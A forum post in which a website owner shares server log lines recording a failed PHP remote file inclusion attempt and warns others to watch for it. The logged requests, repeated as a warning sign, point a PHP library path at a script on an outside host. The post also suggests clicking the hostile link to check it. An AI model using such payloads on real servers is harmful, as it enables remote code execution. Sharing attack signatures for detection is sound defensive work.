I noticed today a very suspecious entry while viewing my log files and thought I would share it here so others might know what sort of thing to look out for. Its a good idea imo to click the link to make sure it didn't work too if you ever spot something like this. I could be wrong about this though. :/
Host: 85.111.12.199
//?_PHPLIB[libdir]=http://jokoyuma.fileave.com/idsatu.txt???
Http Code: 200 Date: Nov 09 08:56:25 Http Version: HTTP/1.1 Size in Bytes: 9413
Referer: -
Agent: Mozilla/5.0
/Stats.php//?_PHPLIB[libdir]=http://jokoyuma.fileave.com/idsatu.txt???
Http Code: 200 Date: Nov 09 08:56:28 Http Version: HTTP/1.1 Size in Bytes: 9137
Referer: -
Agent: Mozilla/5.0
It didn't seem to work in this case but I did report this to www.fileave.com to get it removed from there because that file is quite obviously used for hacking if you was to have a look at it. And to the persons ISP as well. Sadly its in Turkey and I doubt they will do much. Guess I will see if they respond back to me.
When you look at your log files, you do do this ever so often, right? If you see something like:
//?_PHPLIB[libdir]=http://jokoyuma.fileave.com/idsatu.txt??? for a requested URL this should throw a red flag in your mind.
Thankfully WHB has good security in place and this hacking attempt failed.
I hope this helps other to know what sort of bad stuff to be on the look out for.
Thanks,
MyWebs


LinkBack URL
About LinkBacks




Reply With Quote



